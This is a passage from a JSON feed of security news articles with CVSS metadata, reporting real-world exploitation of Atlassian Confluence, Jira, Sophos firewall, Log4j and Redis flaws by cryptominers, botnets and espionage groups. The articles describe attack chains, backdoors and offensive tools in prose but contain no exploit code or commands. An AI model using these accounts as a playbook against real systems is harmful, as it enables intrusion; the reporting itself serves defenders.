"https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-ECBRNAQfxt4/YTc5IJ3yF6I/AAAAAAAADvk/AKO-gQEBwOICCTQJArFbT7OQXrde61d-wCLcBGAsYHQ/s0/jenkin.jpg>)\n\nThe maintainers of Jenkins\u2014a popular open-source automation server software\u2014have disclosed a security breach after unidentified threat actors gained access to one of their servers by exploiting a recently disclosed vulnerability in Atlassian Confluence service to install a cryptocurrency miner.\n\nThe \"successful attack,\" which is believed to have occurred last week, was mounted against its Confluence service that had been deprecated since October 2019, leading the team to take the server offline, rotate privileged credentials, and reset passwords for developer accounts.\n\n\"At this time we have no reason to believe that any Jenkins releases, plugins, or source code have been affected,\" the company [said](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) in a statement published over the weekend.\n\nThe disclosure comes as the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments.\n\nTracked as CVE-2021-26084 (CVSS score: 9.8), the flaw concerns an OGNL (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAccording to cybersecurity firm Censys, a search engine for finding internet devices, around 14,637 exposed and vulnerable Confluence servers were discovered right before details about the flaw became public on August 25, a number that has since dropped to 8,597 as of September 5 as companies continue to apply Atlassian's patches and pull afflicted servers from being reachable over the internet.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T10:05:00", "type": "thn", "title": "Latest Atlassian Confluence Flaw Exploited to Breach Jenkins Project Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-07T10:05:28", "id": "THN:F076354512CA34C263F222F3D62FCB1E", "href": "https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-01T09:57:46", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiYAJVYh7pU2b-Cxud9O1OpqsSwZ8YbSRc4HT6Cl84UE1B0y7nA6w78v6G2gfrH0CgQlYIfu0sypoAedPhkg5IjEPSr4btJnWbRlNUVivoYBtop-pya2puoyFdfhMSBEHez9B2xUru68Zv-DLxNWbxFad3b5mVOAcpQY8lBe_JBMpXEgmBFN0ec7z-R/s728-e100/linux.jpg>)\n\nA cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.\n\n\"The updates include the deployment of new versions of a crypto miner and an IRC bot,\" Microsoft Security Intelligence [said](<https://twitter.com/MsftSecIntel/status/1542281805549764608>) in a series of tweets on Thursday. \"The group has actively updated its techniques and payloads over the last year.\"\n\n8220, active since [early 2017](<https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html>), is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It's also the developer of a tool called whatMiner, which has been co-opted by the [Rocke](<https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html>) cybercrime group in their attacks.\n\nIn July 2019, the Alibaba Cloud Security Team [uncovered](<https://www.alibabacloud.com/blog/8220-mining-group-now-uses-rootkit-to-hide-its-miners_595055>) an extra shift in the adversary's tactics, noting its use of rootkits to hide the mining program. Two years later, the gang [resurfaced](<https://www.lacework.com/blog/8220-gangs-recent-use-of-custom-miner-and-botnet/>) with Tsunami [IRC botnet](<https://en.wikipedia.org/wiki/IRC_bot>) variants and a custom \"PwnRig\" miner.\n\nNow according to Microsoft, the most recent campaign striking i686 and x86_64 Linux systems has been observed weaponizing remote code execution exploits for the freshly disclosed Atlassian Confluence Server ([CVE-2022-26134)](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>) and Oracle WebLogic ([CVE-2019-2725](<https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html>)) for initial access.\n\nThis step is succeeded by the retrieval of a malware loader from a remote server that's designed to drop the PwnRig miner and an IRC bot, but not before taking steps to evade detection by erasing log files and disabling cloud monitoring and security software.\n\nBesides achieving persistence by means of a cron job, the \"loader uses the IP port scanner tool 'masscan' to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool 'spirit' to propagate,\" Microsoft said.\n\nThe findings come as Akamai [revealed](<https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations>) that the Atlassian Confluence flaw is witnessing a steady 20,000 exploitation attempts per day that are launched from about 6,000 IPs, down from a peak of 100,000 in the immediate aftermath of the bug disclosure on June 2, 2022. 67% of the attacks are said to have originated from the U.S.\n\n\"In the lead, commerce accounts for 38% of the attack activity, followed by high tech and financial services, respectively,\" Akamai's Chen Doytshman said this week. \"These top three verticals make up more than 75% of the activity.\"\n\nThe attacks range from vulnerability probes to determine if the target system is susceptible to injection of malware such as web shells and crypto miners, the cloud security company noted.\n\n\"What is particularly concerning is how much of a shift upward this attack type has garnered over the last several weeks,\" Doytshman added. \"As we have seen with similar vulnerabilities, this CVE-2022-26134 will likely continue to be exploited for at least the next couple of years.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-01T05:36:00", "type": "thn", "title": "Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2022-26134"], "modified": "2022-07-01T08:20:23", "id": "THN:F0450E1253FFE5CA527F039D3B3A72BD", "href": "https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T15:21:14", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjZikEHbQZH2740G4dp8jO0kyRIM7gekb01xPNfj0-CNWOHWfP49M11r5XMILsEcE7cPt2iS2r5JguGaSn_eB79jXM2K0R34NTk8BJ914Rl12I6nIAEFE-yl5_wTmv9bEkhsALDug2BF38CByGj0bXfCDfOdw9gmkOjWBtZi0TtheQni8IQOx3M9hnZ/s728-e100/hacking.jpg>)\n\nA threat actor is said to have \"highly likely\" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector.\n\nThe attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as **TAC-040**.\n\n\"The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory,\" the company [said](<https://www.deepwatch.com/labs/deepwatch-ati-detects-and-responds-to-never-before-discovered-backdoor-deployed-using-confluence-vulnerability-for-suspected-espionage/>). \"After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.\"\n\nThe Atlassian vulnerability suspected to have been exploited is [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>), an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.\n\nFollowing reports of active exploitation in real-world attacks, the issue was addressed by the Australian company on June 4, 2022.\n\nBut given the absence of forensic artifacts, Deepwatch theorized the breach could have alternatively entailed the exploitation of the Spring4Shell vulnerability ([CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>)) to gain initial access to the Confluence web application.\n\nNot much is known about TAC-040 other than the fact that the adversarial collective's goals could be espionage-related, although the possibility that the group could have acted out of financial gain hasn't been ruled out, citing the presence of a loader for an XMRig crypto miner on the system.\n\nWhile there is no evidence that the miner was executed in this incident, the Monero address owned by the threat actors has netted at least 652 XMR ($106,000) by hijacking the computing resources of other systems to illicitly mine cryptocurrency.\n\nThe attack chain is also notable for the deployment of a previously undocumented implant called Ljl Backdoor on the compromised server. Roughly 700MB of archived data is estimated to have been exfiltrated before the server was taken offline by the victim, according to an analysis of the network logs.\n\nThe malware, for its part, is a fully-featured trojan virus designed to gather files and user accounts, load arbitrary .NET payloads, and amass system information as well as the victim's geographic location. \n\n\"The victim denied the threat actor the ability to laterally move within the environment by taking the server offline, potentially preventing the exfiltration of additional sensitive data and restricting the threat actor(s) ability to conduct further malicious activities,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T10:24:00", "type": "thn", "title": "Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26134"], "modified": "2022-08-05T14:21:49", "id": "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "href": "https://thehackernews.com/2022/08/hackers-exploited-atlassian-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-18T03:57:04", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjgpvdXejiTfwIlf3wPHIzsqwrtWGd_UVqF569qifyNIKommhLUjf5dLuF__8BWAVuomoK7Tjv03yLr8nENvhakrn1qW-YxaHhRkYOtDEmW8uq9xYxqTrmWnx4a-valU6Pz2wW9AJDs3n89ygTe8g5wduuCsFDkSwFnxhC6LGVpEIRGHIbakY-7iAww/s728-e100/hackers.jpg>)\n\nA sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack.\n\n\"The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks against the customer's staff,\" Volexity [said](<https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/>) in a report. \"These attacks aimed to further breach cloud-hosted web servers hosting the organization's public-facing websites.\"\n\nThe zero-day flaw in question is tracked as [CVE-2022-1040](<https://thehackernews.com/2022/03/critical-sophos-firewall-rce.html>) (CVSS score: 9.8), and concerns an authentication bypass vulnerability that can be weaponized to execute arbitrary code remotely. It affects Sophos Firewall versions 18.5 MR3 (18.5.3) and earlier.\n\nThe cybersecurity firm, which issued a patch for the flaw on March 25, 2022, noted that it was abused to \"target a small set of specific organizations primarily in the South Asia region\" and that it had notified the affected entities directly.\n\nNow according to Volexity, early evidence of exploitation of the flaw commenced on March 5, 2022, when it detected anomalous network activity originating from an unnamed customer's Sophos Firewall running the then up-to-date version, nearly three weeks before public disclosure of the vulnerability.\n\n\"The attacker was using access to the firewall to conduct man-in-the-middle (MitM) attacks,\" the researchers said. \"The attacker used data collected from these MitM attacks to compromise additional systems outside of the network where the firewall resided.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjfKjGMxU9f1By4kZoaueFeICYJthIRyuvPWTxc8s0q2C7jWNX1Gnw6l06cNevtbWwc-WlR-RqbNxeIsdNPX2peEnO-wx8UlXLZt_DXhDA1SO-PFFO9ZBTJgHRcFERamkXbe2rC2UmykVCY8sMi4uQAmKGhBFdo0cmodi9751cbQW1T4L9-2SdlpXhr/s728-e100/cyber.jpg>)\n\nThe infection sequence post the firewall breach further entailed backdooring a legitimate component of the security software with the [Behinder](<https://github.com/Freakboy/Behinder>) web shell that could be remotely accessed from any URL of the threat actor's choosing.\n\nIt's noteworthy that the Behinder web shell was also leveraged earlier this month by Chinese APT groups in a separate set of intrusions exploiting a zero-day flaw in Atlassian Confluence Server systems ([CVE-2022-26134](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>)).\n\nAdditionally, the attacker is said to have created VPN user accounts to facilitate remote access, before moving on to modify DNS responses for specially targeted websites \u2014 primarily the victim's content management system (CMS) \u2014 with the goal of intercepting user credentials and session cookies.\n\nThe access to session cookies subsequently equipped the malicious party to take control of the WordPress site and install a second web shell dubbed [IceScorpion](<https://zhuanlan.zhihu.com/p/354906657>), with the attacker using it to deploy three open-source implants on the web server, including [PupyRAT](<https://github.com/n1nj4sec/pupy>), [Pantegana](<https://github.com/cassanof/pantegana>), and [Sliver](<https://github.com/BishopFox/sliver>).\n\n\"DriftingCloud is an effective, well equipped, and persistent threat actor targeting [five-poisons](<https://en.wikipedia.org/wiki/Five_Poisons>)-related targets. They are able to develop or purchase zero-day exploits to achieve their goals, tipping the scales in their favor when it comes to gaining entry to target networks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-17T09:39:00", "type": "thn", "title": "Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-26134"], "modified": "2022-06-18T03:43:31", "id": "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "href": "https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj61Yvi82eU_SsNVfNm8WazXtxvcYXm-sCRLGmk5m-EijyMKxnX7EywsH3x3g08_XJKLrzN6v1fAWhIVPYSGdCWww6qP6J3eriq2RAyEhFEI8Q7GpR1uolW0eRgUZr8gQDOyMty2WhvSGuA8o5zI4uVLgouljVIzwLo6jec4rUwyfZxNM2dJrDTyvOE/s728-e100/jira.jpg>)\n\nAtlassian has published a security advisory warning of a critical vulnerability in its Jira software that could be abused by a remote, unauthenticated attacker to circumvent authentication protections.\n\nTracked as [**CVE-2022-0540**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0540>), the flaw is rated 9.9 out of 10 on the CVSS scoring system and resides in Jira's authentication framework, Jira Seraph. Khoadha of Viettel Cyber Security has been credited with discovering and reporting the security weakness.\n\n\"A remote, unauthenticated attacker could exploit this by sending a specially crafted HTTP request to bypass authentication and authorization requirements in WebWork actions using an affected configuration,\" Atlassian [noted](<https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html>).\n\nThe flaw affects the following Jira products -\n\n * Jira Core Server, Jira Software Server and Jira Software Data Center: All versions before 8.13.18, 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x before 8.20.6, and 8.21.x\n * Jira Service Management Server and Jira Service Management Data Center: All versions before 4.13.18, 4.14.x, 4.15.x, 4.16.x, 4.17.x, 4.18.x, 4.19.x, 4.20.x before 4.20.6, and 4.21.x\n\nFixed Jira and Jira Service Management versions are 8.13.18, 8.20.6, and 8.22.0 and 4.13.18, 4.20.6, and 4.22.0.\n\nAtlassian also noted that the flaw affects first and third-party apps only if they are installed in one of the aforementioned Jira or Jira Service Management versions and that they are using a vulnerable configuration.\n\nUsers are strongly recommended to update to one of the patched versions to mitigate potential exploitation attempts. If immediate patching isn't an option, the company is advising updating the affected apps to a fixed version or disabling them altogether.\n\nIt's worth noting that a critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild last year to [install](<https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html>) [cryptocurrency miners](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) on compromised servers.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T05:52:00", "type": "thn", "title": "Atlassian Drops Patches for Critical Jira Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-0540"], "modified": "2022-04-23T05:52:42", "id": "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "href": "https://thehackernews.com/2022/04/atlassian-drops-patches-for-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhxt34pnwkNBgdh1y4-6xfSP-mpRKSltUMdSLDF55Eno17d47MYCQMSDAGq2OZeCWpHDNnZUH8W1fIjZdtvlDKtRo_8406-8p3Tt1czUwjmnUWHQH1uhmjFu2w55IgERDhFTLDY9xJoJtni4DCbI0Mq1L1iwjJ2yLvaZvWMTnwKtZmlFsZO1DMdbQ0a>)\n\nThreat actors are actively [weaponizing](<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/>) unpatched servers affected by the newly identified \"[**Log4Shell**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)\" vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine days before it even came to light.\n\nNetlab, the networking security division of Chinese tech giant Qihoo 360, [disclosed](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) threats such as [Mirai](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>) and [Muhstik](<https://thehackernews.com/2018/05/botnet-malware-hacking.html>) (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow its computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), CVSS score: 9.8) earlier this September.\n\nThe latest development comes as it has emerged that the vulnerability has been under attack for at least more than a week prior to its public disclosure on December 10, and companies like [Auvik](<https://www.reddit.com/r/msp/comments/rdba36/critical_rce_vulnerability_is_affecting_java/>), [ConnectWise Manage](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>), and [N-able](<https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability>) have confirmed their services are impacted, widening the scope of the flaw's reach to more manufacturers.\n\n\"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC,\" Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) Sunday. \"That suggests it was in the wild at least nine days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure.\" Cisco Talos, in an independent [report](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>), said it observed attacker activity related to the flaw beginning December 2.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgfMpATNB5GkuC13rGMq6XMiFBdOjwWBuD-ZOuvjNFP7YxSWaotzdhrzjdXbTIaMEp8-l6iWWDH92mwneLD8TjmjuxtRNakibAOsb2Bx7UplaRi0KIfAJe2kSIOkIyBGl9uSFCGFJoM8U83ckS-pICLmEcmdQGD1quBku8bU4z_kfoRubl5R-sNju8bog>)\n\nTracked [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (CVSS score: 10.0), the flaw concerns a case of remote code execution in Log4j, a Java-based open-source Apache logging framework broadly used in enterprise environments to record events and messages generated by software applications.\n\nAll that is required of an adversary to leverage the vulnerability is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.\n\n\"The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,\" Microsoft 365 Defender Threat Intelligence Team [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in an analysis. \"Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.\"\n\nIn particular, the Redmond-based tech giant said it detected a wealth of malicious activities, including installing Cobalt Strike to enable credential theft and lateral movement, deploying coin miners, and exfiltrating data from the compromised machines.\n\nThe situation has also left companies scrambling to roll out fixes for the bug. Network security vendor SonicWall, in an [advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032>), revealed its Email Security solution is affected, stating it's working to release a fix for the issue while it continues to investigate the rest of its lineup. Virtualization technology provider VMware, likewise, warned of \"[exploitation attempts in the wild](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>),\" adding that it's pushing out patches to a number of its products.\n\nIf anything, incidents like these illustrate how a single flaw, when uncovered in packages incorporated in a lot of software, can have ripple effects, acting as a channel for further attacks and posing a critical risk to affected systems. \"All threat actors need to trigger an attack is one line of text,\" Huntress Labs Senior Security Researcher John Hammond [said](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>). \"There's no obvious target for this vulnerability \u2014 hackers are taking a spray-and-pray approach to wreak havoc.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T05:10:00", "type": "thn", "title": "Apache Log4j Vulnerability \u2014 Log4Shell \u2014 Widely Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-13T14:58:24", "id": "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "href": "https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)\n\nMuhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the 